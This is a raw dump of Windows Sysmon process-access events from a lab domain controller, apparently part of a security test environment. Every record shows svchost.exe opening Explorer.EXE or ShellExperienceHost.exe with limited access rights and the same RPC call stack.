07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 